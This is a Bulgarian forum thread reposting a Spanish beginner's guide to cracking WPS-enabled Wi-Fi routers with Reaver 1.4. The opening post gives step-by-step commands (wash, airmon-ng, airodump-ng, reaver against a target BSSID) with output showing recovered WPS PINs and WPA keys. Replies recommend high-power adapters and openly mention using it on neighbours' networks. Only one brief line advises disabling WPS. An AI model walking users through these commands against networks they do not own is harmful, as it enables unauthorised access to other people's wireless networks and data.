атака със reaver 1.4 WPS за новобранци в занаята

ba6tata4

New Member
Buenas:

Hemos estado hablando del tema pero no hemos hecho ningun post :silbar:

Reaver lo podeis descargar aqui http://code.google.com/p/reaver-wps/downloads/list o bien usarlo con wifiway (que ya lo lleva incorporado)

1.- Walsh --> Lo que hará es detectar qué APs pudiesen ser vulnerables (actualmente es wash sin "l")

Walsh v1.3

Required Arguments:
-i, --interface=<iface> Interface to capture packets on
-f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files

Optional Arguments:
-c, --channel=<num> Channel to listen on [auto]
-o, --out-file=<file> Write data to file
-n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15]
-C, --ignore-fcs Ignore frame checksum errors
-5, --5ghz Use 5GHz 802.11 channels
-s, --scan Use scan mode
-u, --survey Use survey mode [default]
-h, --help Show help

Ejemplo de uso: walsh -i mon0 (actualmente sería wash -i mon0)

Scanning for supported APs...

00:19:15:XXXXXXXX WLAN_5XXX
00:19:15:XXXXXXXX WLAN_3XXX
X0:21:B7:XXXXXXXX XXXXXXXXX
64:68:0C:XXXXXXXX WLAN_XXXX
C4:3D:C7:XXXXXXXX ONOXXX

Lo debeis parar con control+c

2.- reaver: Sirve para lanzar los PINS e ir probando. Puede llegar a tardar muchas horas (como 11 que tardé yo, por ejemplo)

Uso: reaver -i mon0 -b C4:3D:C7:XXXXXXXX -vv

Resultado

94.67% complete @ 2012-01-08 08:34:36 (4 seconds/attempt)
WPS PIN: '5XXXXXXX'
WPA PSK: '1XXXXXXXXX'
AP SSID: 'ONOXXXX'


Así que ya sabeis que debeis deshabilitar el WPS de vuestro router

Un saludo

ChimoC

P.D.: Si tecleais

reaver --man

Os saldrán más cosillas
-------------------------------------------------------------------

CHIPSETS SOPORTADOS:

Atheros AR2425 (ath5k)
Atheros AR5212
Atheros AR5213A
Atheros AR542x
Atheros AR9271 (Perfecto)
rtl8187L
rtl8187B
rtl8188ru
rtl8192cu
carl19170
ipw2000
rt2800pci
Intel 3945ABG
Intel 5100
iwl3954
iwl4965
zd1211rw

CHIPSETS CON SOPORTE PARCIAL:

ath5k
iwlagn
rtl2800usb (con compat-wireless)
b43 (Broadcom BCM4312 card)
rt73 (con driver rt2501usb)
rt2800usb (con compat-wireless-2011-12-30)
rtl819x
iwl4965
rtl8188ru
rtl8192cu

CHIPSETS NO SOPORTADOS:

iwl4965
RT3070L
Netgear WG111v3
rt2800usb (RTL3070)
rt2500
rt2570
Ipw2200
RT73usb
BCM4322
zd1211usb



--------------------------------------------------------------------

Un ejemplo del user GARCAD


Se puede usar el binario de walsh 1.3 en wifiway 3.4 perfectamente desde el directorio por ejemplo /root al mismo tiempo que tener instalada la version 1.4

Para los que les quede duda, mas rapido en mi caso imposible 5 segundos.

Código:

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Switching mon0 to channel 1
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: XXXX)
[+] Trying pin XXXXXXXX
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending M2 message
[+] Sending M4 message
[+] Sending M6 message
[!] WPS transaction failed, re-trying last pin
[+] Key cracked in 5 seconds
[+] WPS PIN: 'XXXXXXXX'
[+] WPA PSK: 'nXXXXXXXXXXXXXX0'
[+] AP SSID: 'XXXXXXXX'
[+] Nothing done, nothing to save.

Yo el proceso lo hago del siguiente modo.

Pongo en modo monitor el adaptador

Código:

# airmon-ng start wlan0


Me crea un clon mon0

Necesito saber el canal que emite mi router por lo que utilizo el siguiente comando para capturar el trafico con airodump-ng y visualizar el canal

Código:

# airodump-ng mon0


Cuando se en el canal que emite, cierro la ventana y sigo con...

Código:

# airodump-ng mon0 -w wps-test --beacons --chanel NUMERO --bssid ELQUETENGO


Cuando termina el proceso de capturar abrimos con Wireshark el archivo wps-test.cab.

Yo ya se que lo tengo activado, pero como han explicado como mirarlo con Wireskark sigo con el mismo rol.

Buscamos un broadcast de nuestro router como se puede ver en la siguiente imagen.



Localizamos WPS y si esta activo o no lo esta.

Si Wifi Protected Setup visualizamos 0x02 esta activo se puede mirar si es vulnerable, si vemos 0x01 esta en modo manual, desactivado.

Como esta activada la protección con Wireskark en el archivo *.cap podemos ver 0x02 puedo empezar el ataque con el reaver.

Código:

# reaver -i mon0 -b BSSIDELQUETENGAS -c ELCANLAQUEEMITES -e ESSIDELQUETENGAS -d 15 -vv

original post http://foro.elhacker.net/wireless_e...idad_de_wpa_por_wps_habilitado-t350507.0.html
Salu2:D
 
От: атака със reaver 1.4 WPS за новобранци в занаята

Уна сервеса пор фавор.

Айде или ги пиши на български, или си ги запази за тебе бащице.
 
От: атака със reaver 1.4 WPS за новобранци в занаята

хубаво де командите в терминала са ясни ,обяснението е на испански ,кво сега да превеждам целия пост ли,ами нама го на български ,поне аз сам търсил кво ли не по фороми няма , има на англиски
 
От: атака със reaver 1.4 WPS за новобранци в занаята

Ами преведи го, като си ПРОФЕСИОНАЛИСТ.
 
От: атака със reaver 1.4 WPS за новобранци в занаята

Ако го търсиш по "форОми", едва ли ще го откриеш, но виж по "форУми" може и да намериш нещо. За всички, които са решили да снифят мрежата на комшиите - имайте предвид, че масовите чипове на wireless адапторите не се поддържат от този софтуер. Въпреки, че е написано, че Broadcom 43** се поддържа частично, резултата е нулев. Или си вземате карта с чипове Intel, Atheos, Realtek или не се мъчите изобщо.
 
От: атака със reaver 1.4 WPS за новобранци в занаята

Ако го търсиш по "форОми", едва ли ще го откриеш, но виж по "форУми" може и да намериш нещо. За всички, които са решили да снифят мрежата на комшиите - имайте предвид, че масовите чипове на wireless адапторите не се поддържат от този софтуер. Въпреки, че е написано, че Broadcom 43** се поддържа частично, резултата е нулев. Или си вземате карта с чипове Intel, Atheos, Realtek или не се мъчите изобщо.
това е вярно но аз мисля че за да направиш атака и после да ползваш 100% от скороста трябва задължително да имаш адаптар със антена http://www.appinformatica.com/redes-inalambrica-blueway-adaptador-wifi-usb-2w-15dbi.php
 
От: атака със reaver 1.4 WPS за новобранци в занаята

това е вярно но аз мисля че за да направиш атака и после да ползваш 100% от скороста трябва задължително да имаш адаптар със антена http://www.appinformatica.com/redes-inalambrica-blueway-adaptador-wifi-usb-2w-15dbi.php

Не е нужно да имаш адаптер с антена, може и с wifi картата на лаптопа. Важното чипсета да се поддържа от aircrack.

Не всички рутери са податливи на тази атака, но не са и малко, които стават. Няма значение дали криптографията в WPA или WPA 2, важното е WPS-а да не е заключен. Средно за по около 6-8 часа излиза паролата. За интересуващите се ето и инфо на английски.

http://code.google.com/p/reaver-wps/wiki/HintsAndTips
 
От: атака със reaver 1.4 WPS за новобранци в занаята

Не е нужно да имаш адаптер с антена, може и с wifi картата на лаптопа. Важното чипсета да се поддържа от aircrack.

Не всички рутери са податливи на тази атака, но не са и малко, които стават. Няма значение дали криптографията в WPA или WPA 2, важното е WPS-а да не е заключен. Средно за по около 6-8 часа излиза паролата. За интересуващите се ето и инфо на английски.

http://code.google.com/p/reaver-wps/wiki/HintsAndTips
ако е на 100 метра със картата на лаптопа едва ли ще можеш за 6-8 часа и дори да стане за повече после нямаш скорост говоря от личен опит
 
От: атака със reaver 1.4 WPS за новобранци в занаята

Ако е на 100 метра в градска среда и с такъв usb адаптер няма да имаш успех.

Ако някой се колебае за мощен usb адаптер това е изборът:

http://www.ebay.com/sch/i.html?_trk....TR0.TRC0&_nkw=1000mw+alfa&_sacat=0&_from=R40

Позлвам го от 4 години, изключително е мощен, стабилен и здрав.
 
От: атака със reaver 1.4 WPS за новобранци в занаята

да виждам че ги ползват тука много,чел сам че е стабилен,но за инжектиране препоръчвам моя :roll:
 

Горе